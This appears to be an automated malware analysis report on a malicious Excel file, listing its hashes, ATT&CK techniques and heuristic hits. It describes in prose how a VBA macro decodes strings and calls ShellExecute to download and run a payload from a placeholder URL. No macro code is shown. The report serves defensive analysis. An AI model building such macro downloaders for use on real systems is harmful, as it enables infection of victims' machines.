Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c7386a5b02bf56ea…

MALICIOUS

Office (OLE)

119.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel
MD5: 86d04735e11e91474dc5a8b20f5d895c SHA-1: 26dca4cf90a1e41bc19c2724e1c5aa7fb524683a SHA-256: c7386a5b02bf56ea6569d4c0a4544694142fb8afd4e3118999880aa8df6ff025
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is an Excel document containing VBA macros. The Workbook_Activate subroutine triggers the execution of a function that uses CreateObject to instantiate an object, then calls ShellExecute. The arguments for ShellExecute are constructed by concatenating strings and then de-obfuscating them using the EYHT function. The reconstructed arguments indicate an attempt to execute a downloaded payload from the URL "http://www.example.com/payload.exe". This suggests a macro-based downloader attack.

Heuristics 3

  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
5010863a564884c754e72127b92e375340b2b1b093c9bdd4d4204e569b824ba9		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1410 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.